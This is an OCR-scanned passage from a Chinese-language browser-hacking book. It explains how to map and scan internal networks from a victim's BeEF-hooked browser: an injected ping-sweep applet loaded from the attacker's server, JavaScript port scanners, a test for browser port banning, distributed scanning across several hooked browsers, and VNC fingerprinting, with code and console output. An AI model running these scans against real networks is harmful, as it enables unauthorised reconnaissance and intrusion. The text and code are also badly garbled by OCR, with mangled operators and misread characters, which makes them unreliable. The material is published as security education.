private static String checkHosts(List<InetAddress> inetAddresses) 
throws IOException { 
String alive = ""; 
for (InetAddress inetAddress : inetAddresses) { 
if (inetAddress.isReachable(timeout)) { 
alive += inetAddress.toString() + "\n"; 
} 
} 
return alive; 
} 
} 


之 后 ,可 以 使 用 如 下 代码 , 将 上 面 的 Java 小 程序 注入 色 连 浏览 器 。 这 里 使 用 的 是 peef . dom. 
attachApplet () 图 数 ， 与 $.3.4 节 介绍 的 一 样 : 


var ipRange = "192.168.0.1-192.168.0.254"; 
var timeout = "2000"; 

var appletTimeout = 30; 

var output = ""; 























pF 


var hostNumber = 0; 
var internal_counter = 0; 
beef.dom.attachApplet('pingSweep', 'pingSweep', 'pingSweep', 


"http://"+beef.net.host+":"+beef.net.port+"/", null, 
{[{'ipRange':ipRange, 'timeout':timeout)]); 








function waituntilok() ( 
try { 
hostNumber - document.pingSweep.getHostsNumber(); 
if(hostNumber != null && hostNumber > 0) { 
// 查询 小 程序 ， 取 回 有 效 主机 
output = document.pingSweep.getAliveHosts(); 
clearTimeout (int_timeout) ; 
clearTimeout (ext_timeout) ; 
console.log('Alive hosts: '+output); 
beef.dom.detachApplet('pingSweep'); 
return; 
} 
}catch(e){ 
internal_counter++; 
if(internal counter > appletTimeout) { 
console.log('Timeout after '+tappletTimeout+' seconds'); 
beef.dom.detachApplet('pingSweep'); 
return; 
} 
int timeout = setTimeout(function() (waituntilok()),1000); 
} 
} 


ext_timeout = setTimeout (function() {waituntilok()},5000); 

把 这 段 pingSweep Java 小 程序 添加 到 勾 连 网 页 的 DOM 之 后 ，document .pingSweep. 
getAliveHosts () 就 会 被 调用 。 如 果 小 程序 尚未 完成 ， 那 么 前 面 的 调用 会 抛 出 异常 ， 而 代码 会 
稍 等 片刻 再 次 调用 它 。 整 个 过 程 会 一 直 持 续 ， 直 至 小 程序 返回 了 完整 的 主机 列表 ， 或 者 到 达 30 
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秒 的 超时 时 间 。 满 足 前 述 任何 一 个 条 件 , 都 会 调用 beef .dom.detachApplet () 将 DOM 清 理 干 净 。 
使 用 这 个 技术 , 或 者 前 面 讨论 的 JavaScrip 仿 法 , 应 该 可 以 对 勾 连 浏览 器 所 在 内 网 的 子 网 ,以 
及 有 哪些 主机 在 活动 有 了 相当 全 面 的 了 解 。 


10.3 ”扫描 端口 


相对 准确 地 知道 了 可 用 主机 之 后 ,下 一 步 就 是 要 确定 这 些 主机 都 打开 了 哪些 端口 。 为 此 ,这 
一 步 就 需要 扫描 端口 。 如 果 要 对 其 他 目标 执行 攻击 ， 那 这 一 步 必 不 可 少 。 

SPI Dynamics* 在 2006 年 发 表 了 关于 在 浏览 器 中 用 JavaScript 扫 描 端 口 的 第 一 份 公开 研究 论 
文 。 最 初 采用 的 技术 在 当时 还 是 很 有 创新 性 的 ， 使 用 了 IMG 标 签 和 自 定义 的 onload/onerror 事 
件 处 理 程序 ， 以 及 计时 项 。 

此 后 不 久 ，Jeremiah Grossman 在 BlackHat 2006 上 发 布 了 自己 的 研究 成 果 ”， 亮 点 就 是 通过 浏 
览 器 来 攻击 内 网 的 例子 。 后 来 ,Petko Petkov "发布 了 第 一 套 可 靠 的 JavaScript 端 口 扫描 程序 的 实现 ， 
如 下 所 示 : 


scanPort: function(callback, target, port, timeout) { 
var timeout = (timeout == null) ?100:timeout; 
var img = new Image(); 






































img.onerror = function () { 
if (!img) return; 
img - undefined; 
callback(target, port, 'open'); 
Ja 


img.onload = img.onerror; 
// 注意 ,用 了 http:// 
img.src = 'http://' + target + ':' + port; 


setTimeout (function () { 

if (!img) return; 

img - undefined; 

callback(target, port, 'closed'); 
), timeout); 


}, 


// ports str iR24$&"80,8080,8443"Z X$j 
scanTarget: function(callback, target, ports str, timeout) { 
var ports - ports str.split(","); 


for (index = 0; index < ports.length; index++) { 
this.scanPort(callback, target, ports[index], timeout); 





m 
) 


虽然 这 种 技术 年 代 有 点 和 久远 了 , 但 目前 仍然 被 认为 是 较为 可 靠 的 端口 扫描 方法 。 当 然 也 有 新 
方法 出 现 ,比如 使 用 CORS 或 WebSocket 请 求 , 但 实践 表明 它们 都 没有 那么 可 靠 , 有 的 在 现代 浏览 
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器 升级 后 就 会 失效 。 需 要 说 明 的 是 ，Petkov 的 方法 也 有 局 限 性 。 比 如 ， 在 浏览 锅 中 通过 端口 封 
(port banning ) 可 以 限制 哪些 端口 能 通过 HTTP 请 求 来 访问 。 














10.3.1 绕 过 端口 封禁 

除了 同 源 策略 ， 现 代 浏 览 器 通常 都 具备 另 一 项 限制 功能 ， 可 以 防御 对 非 HTTP 服 务 的 攻击 。 
这 个 功能 被 称 为 端口 封禁 ,可 以 屏蔽 对 22、25、110 或 143 等 特殊 端口 的 请 求 ， 以 防止 浏览 器 向 运 
行 在 已 知 端口 上 的 服务 发 出 请 求 。 


端口 封禁 是 浏览 器 实现 的 一 种 安全 防范 机 制 ， 可 以 拒绝 对 非 标 准 TCP 端 口 的 连接 。 如 果 你 
有 有 Web 服务器 运行 在 端口 143 (IMAP 而 非 HTTP 的 默认 端口 ) 上 上， 那么 你 就 无 法 连接 到 它 。 多 
数 Web 服 务 器 都 在 80 和 443, 或 者 8080 和 8443 端 口上 发 布 Web 内 容 。 当 然 有 些 Web 服 务 和 其 他 应 
用 或 协议 也 会 有 例外 。 

各 浏览 器 对 端口 封禁 的 实现 也 不 一 致 。( 太 令 人 惊讶 了 1! ) 虽然 这 种 安全 机 制 也 可 以 放宽 ， 
但 与 其 他 安装 机 制 不 同 ， 它 不 能 像 SOP 那 样 通 过 特殊 的 HTTP 首 部 、HTML 标 签 或 属性 来 配置 ， 
而 是 所 有 配置 都 放 在 浏览 器 核心 配置 项 里 面 。 

在 Firefox 里 ,通过 在 地 址 栏 访 问 about :config, 然 后 把 端口 添加 进 network.security. 
ports.banned.override 属 性 ， 可 以 解 封 端 口 。 

在 Chrome 中 ,必须 在 命令 行 中 以 特殊 选项 , 比如--explicitly-allowed-ports=PORT， 


启动 该 浏览 器 。 


























前 面 的 JavaScript 端 口 扫描 实现 ,使 用 了 HTTP 协 议 去 连接 一 个 自 定义 的 TCP 端 口 。 当 然 ， 如 
果 你 想 访 问 的 正 是 浏览 器 禁止 的 端口 ， 那 不 会 成 功 的 。 图 10-6 展 示 了 在 Firefox 中 尝试 连接 
http:/172.16.37.147:143 的 结果 。 图 10-7 展 示 了 Netcat 监 听 器 。 注 意 ， 它 并 没有 从 Firefox 得 到 任何 
数据 。 








x Problem loading page - Mozilla Firefox 


Edit View History Bookm 


Á Problem loading page 


« [ vb] 














This address is restricted 
This address uses a network port which is normally used for 


purposes other than Web browsing. Firefox has canceled the 
request for your protection. 


{Try Again 














图 10-6 “尝试 通过 HTTP 协 议 连 接 143 端 口 时 出 错 
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eoo Q antisnatchor — nc — 80x24 
Last login: Tue Dec 3 15:21:13 on ttys002 
antisnatchors-Mac-Pro:^ antisnatchor$ sudo nc -l 143 





图 10-7 Netcat 监 听 器 (未 收 到 数据 ) 


端口 封禁 会 拒绝 发 送 到 某 些 TCP 端 口 的 请 求 ,， 这 是 大 多 数 浏览 器 都 已 经 实现 的 防御 机 制 。 然 
ij, 与 SOP 类 似 , 端口 封禁 的 实现 也 存在 问题 。 比 如 , 不 同 浏览 器 的 端口 封禁 实现 不 一 样 。 比 如 ， 
Chrome 和 Safari 会 屏蔽 IRC 默 认 的 端口 6667， 而 Firefox 和 IE 则 不 会 。IRC NAT Pinning 技 术 ， 以 及 
协议 间 通 信和 利用 技术 ， 正 是 基于 这 个 问题 找到 突破 口 的 ， 本 章 后 面 会 介绍 它们 。 

端口 封禁 是 对 2002 年 Sandro Gauci E 44 fI] 33€. "Extended HTML Form attack” 的 反应 。Gauci 
在 2008 年 给 出 了 对 这 个 主题 的 进一步 研究 成 果 ， 并 发 布 了 修订 版 论文 ， 标 题 为 “The Extended 
HTML Form Attack revisited”!“。 在 后 面 这 篇 论文 中 ，Gauci 收 录 了 一 批 被 端口 封禁 屏蔽 的 端口 ， 
包括 不 同 浏览 器 版 本 之 间 的 问题 。 后 面 的 图 10-8 展 示 了 更 新 的 多 款 浏览 器 屏蔽 的 端口 列表 对 比 。 

对 于 开源 浏览 器 ， 由 于 其 代码 公开 可 读 ， 所 以 它们 封禁 的 TCP 端 口 是 众 所 周知 的 。 比 如 ， 可 
以 查看 Chrome 的 net_util.cc”， 或 者 Firefox 的 ncIOService.cpp"“ 文 件 。 显 然 ， 对 焉 等 闭 源 浏览 器 来 
说 ， 是 做 不 到 这 些 的 。 

有 读者 可 能 想 验 证 开源 和 闭 源 浏览 器 都 封禁 了 哪些 端口 , 那么 可 以 使 用 下 面 给 出 的 代码 来 检 
测 实际 被 封禁 的 TCP 端 口 。 代 码 由 服务 器 和 客户 端 两 部 分 组 成 。 其 中 服务 器 端 代 码 是 多 线程 Ruby 
代码 ， 用 于 监听 HTTP 请 求 ， 并 验证 连接 是 否 到 达 了 客户 端 。 而 客户 端 代码 会 迭代 一 组 TCP 端 口 ， 
并 发 送 相应 的 XMLHEtpRequest 给 服务 需 。 

另外 ,还 需要 设置 iptables， 将 所 有 TCP 端 口 的 请 求 转发 到 服务 器 脚本 监听 的 端口 。 假 设 你 把 
脚本 绑 定 到 了 192.168.0.3:10000， 那 么 可 以 在 iptables 中 使 用 以 下 配置 ， 将 所 有 流量 转发 给 TCP 端 
口 10000: 








































































































iptables -A PREROUTING -t nat -i ethl -p tcp --dport\ 
1:65535 -j DNAT --to-destination 192.168.0.3:10000 


这 样 就 不 用 分 别 监 听 每 一 个 TCP 端 口 了 。 下 面 的 Ruby 代 码 会 负责 监听 TCP 端 口 10000: 


require 'socket' 


GGnot banned ports = "" 
def bind_socket (name, host, port) 
server = TCPServer.new(host,port) 
loop do 
Thread.start(server.accept) do |client| 
data = "" 
recv length - 1024 
threshold - 1024 * 512 
while (tmp = client.recv(recv_length) ) 
data += tmp 
break if tmp.length « recv length || 
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tmp.length == recv_length 
# 512 KB max of incoming data 
break if data > threshold 
end 
if data.size > threshold 
print error "More than 512 KB of data" + 
" incoming for Bind Socket [#{name}]." 
else 
headers = data.split(/\r\n/) 
host e mu 
headers.each do |header | 
if header.include? ("Host") 
host = header 
break 
end 
end 
port = host.split(/:/)[2] || 80 
puts "Received connection on port #{port}" 
@@not_banned_ports += "#{port}\n" 
client.puts "HTTP/1.1 200 OK" 
client.close 
end 
client.close 
end 
end 
end 


begin 

bind socket("PortBanning", "192.168.0.3", 10000) 

rescue Exception 

File.open("not, banned browserX",'w')(lfl 
f.write(8Gnot banned, ports) 

J 


end 


服务 器 端 代码 使 用 不 同 的 线程 处 理 每 个 连接 ， 并 解析 HTTP 请 求 首部 。 因 为 Host 首 部 中 包含 











浏览 需 硕 望 连 接 的 TCP 端 口 ， 所 以 要 把 它 提取 出 来 。 如 果 连 接 上 了 ， 则 说 明 端 
屏蔽 该 TCP 端 口 。 


口 封禁 机 制 并 没有 














一 且 执 行 ， 上 面 的 代码 会 一 直 运行 。 要 中 断 它 ， 可 以 按 Ctrl+C， 然 后 未 被 











时 禁 的 端口 号 会 被 


写 进 一 个 文件 供 你 分 析 。 当 然 , 在 此 之 前 ， 必 须 启 动 客户 端 代 码 构成 测试 。 在 浏览 器 中 ,运行 以 
下 JavaScript 客 户 端 代码 。 这 段 代 码 会 每 隔 100 毫 秒 就 向 一 个 不 同 的 TCP 端 口 发 送 一 次 XHR 请 求 ， 


端口 号 从 1 开始 ， 到 7000 为 止 : 


var index = 1; 

// ikAXE|TCP3& 27000 

var end - 7000; 

var target - "http://192.168.0.3"; 
var timeout - 100; 


function connect to port()í( 
f(index «- end)( 
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try{ 
var xhr = new XMLHttpRequest (); 
var port = index; 
var uri = target + ":" + port + "/"; 
xhr.open("GET", uri, false); 
index++; 
xhr.send(); 
console.log("Request sent to port: " + port); 
setTimeout (function() {connect_to_port ();},timeout) ; 
}catch(e) { 
setTimeout (function() (connect to port();),timeout); 
j 
)elset 
console.log("Finished"); 
return; 


j 
} 


connect to port(); 
通过 在 多 个 浏览 器 中 执行 以 上 代码 ,你 会 收 到 一 堆 结 果 。 下 面 的 代码 会 迭代 之 前 输出 的 结果 。 
如 果 发 现 文 件 中 有 间断 ， 则 说 明 缺 少 的 端口 被 封禁 了 ， 因 为 没有 收 到 连接 信息 


U^: 





port - 1 
banned ports - Array.new 
previous port - 1 
File.open('not banned browserX').each do |line| 
current port - line.chomp.to i 
if(current port -- port) 
# go to next port 
port = port + 1 
elsif(port « current port) 
diff - current port - port 
diff.times do 
puts "Banned port: #{port.to_s}" 
banned ports «« port.to s 





port = port + 1 
end 
port = current port + diff 
end 
end 
puts "Banned port list:\n#{banned_ports.join(',')}" 


图 10-8 展 示 了 一 次 检测 的 结果 ， 包 含 Firefox、IE、Chrome 和 Safari 浏 览 器 各 自封 禁 的 端口 。 
表格 中 的 NO 表示 对 应 的 端口 没有 被 封禁 ， 人 允许 使 用 HTTP 协 议 访问 。 

Chrome 和 Safari 封 禁 的 端口 完全 相同 (最 大 端口 号 也 一 样 ), 而 它们 与 Firefox 和 IE 却 有 诸多 不 
同 。IE 是 最 宽容 的 浏览 器 ， 封 禁 的 端口 最 少 ， 只 会 屏蔽 对 下 列 端口 的 连接 : 

1 2010 i9143 220,993 

与 Firefox 一 样 ， 耻 也 人 允许 连接 到 IRC 端 口 。 利 用 这 一 点 ， 可 以 发 动 NAT Pinning 及 其 他 形式 的 
攻击 ， 接 下 来 几 节 会 分 别 讨论 。 
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Internet 
TCP Port Explorer 


19 - chargen 
21 - ftp Y 


22-ssh | 


25 - smtp 


ES 
YES 

53 -dns LE 
110 — pop3 YES 
119 - nntp YES 
ES 

ES 


139 - netbios NO | 


143 -imap Y 


220 —imap3 YES 
993 - imaps YES Y 
995 — pop3s 


vs MEN 
3659 — apple-sasl 
6000 - x11 YES 
6665-6669 - irc | 


图 10-8 不 同 浏览 器 封禁 的 端口 











10.3.2 ”使 用 TMG 标签 扫描 端口 


下 面 给 出 的 方法 与 Petko Petkov 的 JavaScript 端 口 扫描 程序 的 实现 类 似 (该 扫描 程序 是 他 创建 
的 AttackAPI5 工 具 包 中 的 工具 之 一 )。Javier Marcos 针 对 BeEF 项 目 改 进 了 这 个 方案 ， 并 在 OWASP 
AppSec USA 2011 大 会 * 上 对 公众 发 表 ， 其 代码 如 下 所 示 : 


function http_scan(start, protocol_, hostname, port_) { 


























var img_scan = new Image(); 
img scan.onerror = function(evt) { 
var interval = (new Date).getTime() - start; 


if (interval < closetimeout) { 
if (process_port_http == false) { 
port_status_http = 1; // closed 
console.log('Port ' + port + ' is CLOSED'); 
clearInterval (intID_http) ; 
} 
process_port_http = true; 
} 


// 对 onerror 和 onload 事 件 调 用 同样 的 处 理 程序 
img_scan.onload = img_scan.onerror; 
img_scan.src = protocol_ + hostname + ":" + port_; 


intID http = setInterval (function() { 
var interval = (new Date).getTime() - start; 
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E 
E 





if (interval >= opentimeout) { 
if (!img_scan) return; 
img_scan = undefined; 


if (process_port_http == false) { 
port_status_http = 2; // open 
process_port_http = true; 

j 

clearInterval(intID http); 

console.log('Port ' + port + ' is OPEN '); 


olg 


var protocol 
var hostname 


"hetped (4 
"17245165:37.1427*5 


var process, port http = false; 
var port status http - 0; // unknown 


var opentimeout - 2500; 
var closetimeout - 1100; 


var ports - [80,5432,9090]; 


for(var i=0; i<ports.length; i++) { 
var start = (new Date) .getTime(); 
http_scan(start, protocol, hostname, ports[i]); 


} 
图 10-9 展 示 了 在 Firefox 中 运行 上 面 的 代码 ,以 验证 三 个 未 被 封禁 的 TCP 端 口 ( 80 5432 #119090 ) 
的 结果 。 








(4) @ browserhacker.com /portscanning.html 


.« ».-—|*|Console- | HTML CSS Script DOM Net Cookies 





Clear Persist Profile All Errors Warnings | it (interval >= opentimeout){ 


5 if (limg scan) return; 
»»» function http scan(start, protocol., img scan = undefined; 


hostname, p...n(start, protocol, hostname, x 

TS. if (process port http == false)( 
ports[i]); } port status http = 2; // open 
undefined process port http = true; 


) 
Port 9090 is CLOSED clearInterval(intID http); 


console.log('Port ' + port + ' is OPEN '); 
Port 80 is OPEN " 9s penus u 


Port 5432 is OPEN sar 
) 


var process port http = false; 
var port status http = 0; // unknown 





Run Clear Copy History 


图 10-9 在 内 部 网 络 中 发 现 菜系 统 中 的 开放 端 








LI 
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使 用 这 种 技术 在 浏览 器 中 进行 端口 扫描 是 比较 可 靠 的 。 以 前 , 如 果 再 辅 以 WebSocket 和 CORS 
请 求 ， 还 可 以 提高 可 靠 性 。 可 是 ,很 多 现代 浏览 器 都 已 经 对 此 进行 了 限制 。 所 以 ， 单独 使 用 IMG 
标签 通常 是 最 快捷 、 问 题 最 少 的 方法 。 


10.3.3 ”分 布 式 端口 扫描 


通过 浏览 絮 扫 描 端 口 并 非 始 终 是 最 有 效 的 。 浏览 絮 也 受 很 多 因素 限制 , 本 书 前 面 已 经 提 到 了 
一 些 。 为 此 ， 可 以 考虑 采用 分 布 式 技术 来 进一步 优化 端口 扫描 。 

上 一 节 曾 使 用 多 个 工作 进程 优化 了 ping sweep， 而 同样 的 技术 也 适用 于 扫描 端口 。 在 同一 个 
浏览 需 中 通过 多 个 WebWorker 分 担任 务 是 一 种 方式 ， 而 在 多 个 勾 连 浏览 器 中 进行 分 布 式 计算 又 是 
另 一 种 完全 不 同 的 方式 。 假 设 你 勾 连 了 同一 个 子 网 中 的 多 个 浏览 器 。 通 过 集中 管理 的 命令 和 控制 
框架 ， 比 如 BeEF， 就 可 以 实现 分 布 式 端口 扫描 。 可 以 通过 分 布 式 计算 实现 的 攻击 还 有 很 多 ， 比 
如 第 9 章 讨 论 的 利用 SQL 注入 漏洞 等 。 

利用 BeEF 的 REST API 协调 多 个 操作 , 可 以 将 任何 命令 模块 分 配 到 多 个 勾 连 浏览 器 。 这 种 情 
况 下 ， 唯 一 的 要 求 就 是 模块 接收 的 参数 可 以 被 分 配 到 多 个 浏览 器 。Javier Marcos 的 Port Scanner 模 
块 就 可 以 这 样 来 用 ， 让 模块 只 接收 以 下 参数 ， 然 后 在 勾 连 浏览 器 中 排队 。 
O ipHost: 要 扫描 端口 的 目标 IP 地 址 。 
O ports: 要 扫描 的 TCP 端 口 范 围 (或 列表 )。 
从 https:/Wbrowserhackercom 上 可 以 下 载 到 一 个 dist_ pscannerrb 脚 本 , 通过 它 可 以 执行 分 布 式 端 
口 扫描 。 它 会 询问 要 在 哪些 浏览 器 上 执行 分 布 式 扫描 ， 目 标 卫 地址 ， 还 有 TCP 端 口 范围 。 得 到 这 
些 信息 后 , 脚本 就 会 分 割 任务 , 针对 每 个 浏览 如 将 命令 排队 执行 。 以 下 就 是 只 使 用 一 个 浏览 絮 时 
的 命令 (需要 输入 的 命令 加 粗 了 ): 

$ ruby ./dist pscanner.rb 
>>>] BeEF Distributed Port Scanner] 
[+] Retrieved RESTful API token: 

006c1aed13b124d0c1c8fb50c98fb35d04a78d5e 


+] Retrieved Hooked Browsers list. Online: 3 
Retrieved 185 available command modules 




































































































































































dp 


Online Browsers: 

127.0.0.1 - C28 Macintosh 
192.168.1.101 - C28 Windows 7 
127.0.0.1 - C28 Macintosh 


WN HB + 


+] Provide a comma separated list of browsers to use (i.e. 1 or 1,3 or 
14.2; 3) etc): 


+] Using: 
1] 127.0.0.1 - C28 Macintosh 











+] Enter target IP to port scan: 
192.168.1.254 
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+] Enter target ports to scan (i.e. 1-65535 or 22-80 or 1-1024): 
70-80 


Split will be as follows: 
70-80 


H + 


+] Ready to proceed? <Enter> 


+] Starting port scan against 192.168.1.254 from 70-80 [1] 
+] Scan queued... 

1] port=Scanning: 70,71,72,73,74,75,76,797, 78279780 

1] port-WebSocket: Port 80 is OPEN (http) 

1] Scan Finished in 43995 ms 

All Scans Finished!! 

Time Taken: 60.248801 


在 这 个 例子 中 ,只 有 一 个 Chrome 浏 览 器 扫描 了 一 个 IP 地 址 的 70 到 80 端 口 ， 用 时 约 60 秒 。 如 果 
使 用 3 个 勾 连 浏览 器 完成 同样 的 任务 ， 你 会 发 现 结果 会 稍 有 不 同 : 


$ ruby ./dist pscanner.rb 

>>>] BeEF Distributed Port Scanner] 

[+] Retrieved RESTful API token: 
006claed13b124d0c1c8£b50c98fb35d04a78d5e 
Retrieved Hooked Browsers list. Online: 3 
Retrieved 185 available command modules 


ms 











+ 十 


+] Online Browsers: 
1] 127.0.0.1 - C28 Macintosh 
2] 192.168.1.101 - C28 Windows 7 
3] 127.0.0.1 - C28 Macintosh 
+] Provide a comma separated list of browsers to use (i.e. 1 or 1,3 or 
1,2,3 eto): 
1,2,3 
+] Using: 
1] 127.0.0.1 - C28 Macintosh 
2] 192.168.1.101 - C28 Windows 7 
3] 127.0.0.1 - C28 Macintosh 


+] Enter target IP to port scan: 
192.168.1.254 


Enter target ports to scan (i.e. 1-65535 or 22-80 or 1-1024): 


+ 


70-80 

+] Split will be as follows: 
1] 70-73 

2) 74-77 

3] 78-80 





+] Ready to proceed? <Enter> 


Starting port scan against 192.168.1.254 from 70-73 [1] 
Scan queued... 








428 第 10 章 攻击 网 络 





+] Starting port scan against 192.168.1.254 from 74-77 [2] 
+] Scan queued... 

+] Starting port scan against 192.168.1.254 from 78-80 [3] 
+] Scan queued... 

l1] portsScanning: 70,71, 72,73 

2] port=Scanning: 74,75,76,77 

3] port=Scanning: 78,79,80 

3] port=CORS: Port 80 is OPEN (http) 

3] port=WebSocket: Port 80 is OPEN (http) 
2] Scan Finished in 14800 ms 

3] Scan Finished in 11997 ms 

1] Scan Finished in 15998 ms 

+] All Scans Finished!! 

Time Taken: 32.306009 


把 同一 个 命令 分 配 到 3 个 浏览 器 上 ， 耗 时 会 从 原来 的 60 秒 减少 到 约 32 秒 。 如 果 再 减少 勾 连 浏 
览 器 的 轮 询 时 间 ， 同 时 在 匀 连 浏览 器 与 BeEF 之 间 使 用 WebSocket 协 议 作为 主 通 信 渠 道 ,那么 总 任 
务 的 执行 时 间 还 可 以 进一步 减少 。 

虽然 前 面 的 Ruby 脚 本 只 是 为 了 这 个 目的 而 专门 设计 的 ,但 这 并 不 影响 你 通过 BeEF 的 REST 
API 在 勾 连 浏览 融 中 分 配 其 他 任何 逻辑 。 还 有 男 一 个 例子 , 就 是 第 9 章 讨 论 的 使 用 这 种 技术 来 加 快 
SQL 注 入 蜂 域 转 储 数 据 的 过 程 。 


10.4 采集 非 HTTP 服务 的 指纹 


采集 非 HTTP 服 务 的 指纹 与 采集 Web 应 用 的 指纹 区 别 很 大 。 第 9 章 讨 论 过 ， 检 测 Web 应 用 相对 
比较 容易 。 浏 览 器 可 以 使 用 标准 的 HITP 请 求 来 取得 资源 ， 然 后 你 可 以 根据 返回 的 资源 ， 推 断 它 
是 什么 类 型 的 Web 应 用 。 

然而 , 采集 Web 界 面 指纹 的 技术 却 不 能 照搬 到 非 HTTP 服 务 。 因 为 非 HTTP 服 务 通 常 不 会 暴露 
已 知 的 资源 ， 比 如 图 片 或 页 面 ， 这 些 都 可 以 跨 域 识别 并 确认 。 由 于 这 种 限制 ， 通 过 浏览 需 采 集 非 
HTTP 服 务 指纹 的 结果 一 般 都 不 太 可 靠 。 好 在 我 们 可 以 使 用 一 些 技术 来 辅助 从 多 个 侧面 来 增进 对 
目标 服务 的 了 解 。 

第 一 种 技术 就 是 分 析 本 章 开 头 介 绍 的 端口 扫描 的 结果 。 如 果 TCP 端 口 6667 出 现 了 , 那么 根据 
默认 的 端口 号 分 配 规则 ， 可 以 推断 它 是 一 个 IRC 服 务 。 如 果 找 到 了 TCP 5900, 那么 可 以 假设 它 是 
一 个 VNC 服 务 。 当 然 ， 监听 相同 端口 的 服务 可 能 会 有 不 同 的 实现 。 为 此 , 我 们 必须 进一步 提高 确 
定性 ， 以 针对 目标 发 起 适当 的 利用 。 

为 了 进一步 确认 假设 , 甚至 进一步 区 分 不 同 的 VNC 监 听 应 用 ,可 以 分 析 请 求 的 时 间 。 这 是 
采集 非 HTTP 服 务 指纹 的 第 二 种 方法 。Mark Lowe 最 早 使 用 FTP 协 议 , 演示 了 这 种 如 何 实 现 这 一 
技术 “。 而 我 们 这 里 会 使 用 HTTP。 
首先 要 分 析 服 务 请 求 关 闭 TCP 连 接 所 耗费 的 时 间 , 也 就 是 监控 XMLHttpRequest 对 象 的 状态 
什么 时 候 等 于 4 ( 完成 ) ”。 但 仅 通 过 分 析 时 间 差 很 难 区 分 版 本 ， 比 如 UltraVNC 1.0.9 和 1.1.9， 
为 时 间 差 (如果 有 的 话 ) 会 非常 非常 小 。 但 检测 不 同 的 实现 ， 比 如 UltraVNC 和 TightVNC， 倒 不 





















































































































































10.4 采集 非 HTTP 服务 的 指纹 429 
是 没有 可 能 。 可 以 从 以 下 代码 开始 : 
var target. 2 "172,106.37.151*"; 
var port - 5900; 
var count - 1; 
var time - 0; 
function doRequest()( 
if(count <= 3)( 
var xhr - new XMLHttpRequest(); 
var port - 5900; 
xhr.open("POST", "http://" + target + ":" + 
port + "/" + Math.random()); 
var start = new Date().getTime(); 
xhr.send("foo"); 
xhr.onreadystatechange = function () { 
if (xhr.readyState == 4) 
var end = new Date().getTime(); 
console.log("DONE in " + (end-start) + " ms"); 
count++; time += end-start; 
doRequest (); 
j 
j 
}else{ 
console.log ("COMPLETED. Average: " + time/3); 
} 
} 
doRequest(); 


以 上 代码 会 向 同一 个 目标 端口 (5900 ) 发 送 3 个 XHR 请 求 ， 然 后 监控 服务 多 长 时 间 后 关闭 相 
应 的 连接 。 最 后 , 计算 一 下 所 有 连接 关闭 的 平均 时 间 。 图 10-10 展 示 了 针对 TightVNC 2.7.1 的 代码 ， 
图 10-11 展 示 了 对 UltraVNC 1.1.9 实 施 的 相同 测试 。 


= * Console ~ 


Persist Profile (1) Error 


>>> var target = "172.16.37.151"; 
var port = 5900; v...MPLETED. 
Average: " + time/3); } } 
doRequest(); 


> POST http://172.16.37.151:5900/0.8055 
undefined 

DONE in 14 ms 

» POST http://172.16.37.151:5900/0.9756 
DONE in 15 ms 

> POST http://172.16.37.151:5900/0.9360 
DONE in 16 ms 

COMPLETED. Average: 15 


图 10-10 





HTML CSS Script DOM Net Cookies 


var target = "172.16.37.151"; 
var port = 5900; 

var count = 1; 

var time = 0; 


function doRequest()( 

if(count <= 3)( 
var xhr = new XMLHttpRequest(); 
var port * 5900; 
xhr.open("POST", "http://" + target + "i" 
var start = new Date().getTime(); 
xhr.send("foo"); 


+ port + "/" + Math.random()); 


xhr.onreadystatechange = function () { 
if (xhr.readyState == 4) ( 
var end m new Date().getTime(); 
console.log("DONE in ”+ (end-start) + " 
count++; time += end-start; 
doRequest (); 
) 


ms"); 


) 
jelse( 
console.log("COMPLETED. Average: 


" * time/3); 
) 
doRequest(); 





采集 TightVNC 指 纹 
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* Console- HTML CSS Script DOM Net Cookies 


+ t t = "172.16.37.151"; 
lè Clear Persist Profile (T) Error var pore - 5900; 
7 * var count = 1; 
>>> var target = "172.16.37.151"; var time = 0; 
var port = 13500; ...MPLETED. function doRequest (){ 
3)4 


”+ time/3); } } if(count <= 
var xhr = new XMLHttpRequest (); 
var port = 5900; 
» POST http://172.16.37.151:5900/0.3268 xhr.open("POST", "http://" + target + ":" + port + "/" + Math.random()); 
var start = new Date().getTime(); 
undefined xhr.send("foo"); 





DONE in 26 ms zr onreadystatechange = function () { 
h: - 4) 


r.readyState = 


» POST http://172.16.37.151:5900/0.1057 人 T 

DONE in 16 ms cna tei i e n Mt 
» POST http://172.16.37.151:5900/0.9036 y Some 

DONE in 19 ms jeles( 
COMPLETED. Average: console.log("COMPLETED. Average: " * time/3); 
20.333333333333332 ) 


doRequest(); 











图 10-11 采集 UltraVNC 指 纹 


从 这 两 张 图 可 以 看 到 ，TightVNC 的 平均 关闭 时 间 为 1$ 毫 种， 而 UltraVNC 是 20 毫 秒 。 这 个 例 
子 非常 简单 ， 但 实际 上 很 多 服务 要 花费 更 长 的 时 间 。 

第 三 个 采集 指纹 的 方法 是 实现 IPC (Inter-protocol Communication, 协议 间 通 信 ) 请 求 。 比 如 ， 
如 果 浏 览 器 可 以 建立 一 个 双向 信道 监听 Telnet 服 务 , 那 它 就 能 够 看 到 Telnet 服 务 的 首部 。 在 后 面 的 
几 节 中 ， 我 们 会 深入 讨论 这 些 方法 。 在 可 以 实现 耻 C 的 情况 下 ， 特 别 是 可 以 双向 通信 的 情况 下 ， 
采集 指纹 会 非常 方便 。 


10.5 攻击 非 HTTP 服务 


Web 浏 览 器 使 用 标准 的 Web 协 议 通 信 当 然 没什么 可 奇怪 的 ， 可 如 果 要 它们 使 用 别 的 协议 呢 ? 
网 络 上 不 仅 有 HTTP， 还 有 HTTPS。 事 实 上 ， 只 要 有 软件 通过 网 络 发 信息 ， 那 它 使 用 的 不 是 这 种 
协议 ， 就 是 那 种 协议 。 

浏览 器 是 很 “多才多艺 ”的 ， 某 些 时 候 ,， 它 甚至 可 以 跟 本 来 不 是 给 它 设 计 的 通信 目标 的 服务 
通信 。 你 可 能 也 猜 到 了 ,这 种 “多 才 多 艺 ” 也 是 可 以 利用 的 。 那 我 们 接 下 来 就 开始 探讨 怎么 和 用 
浏览 器 对 多 通信 协议 的 支持 。 


















































10.5.1 NAT Pinning 


2010 年 ，Sami Kamkar 发 布 了 一 个 名 叫 NAT Pinning 的 攻击 ”。 这 个 技术 涉及 强制 网 关 设 备 
(比如 SOHO 路 由 器 ) 动 态 为 人 站 连接 打开 一 个 端口 , 而 该 连接 会 连 到 一 个 位 于 内 部 网 络 的 系统 。 
使 用 之 前 讨论 过 的 侦察 技术 ， 假 设 我 们 掌握 了 如 下 信息 。 
口 网 关 : 192.168.0.1 
a 勾 连 浏览 器 的 内 部 JP: 192.168.0.2 
O 在 80 端 口 提供 HTTP 服 务 的 系统 IP: 192.168.0.4 
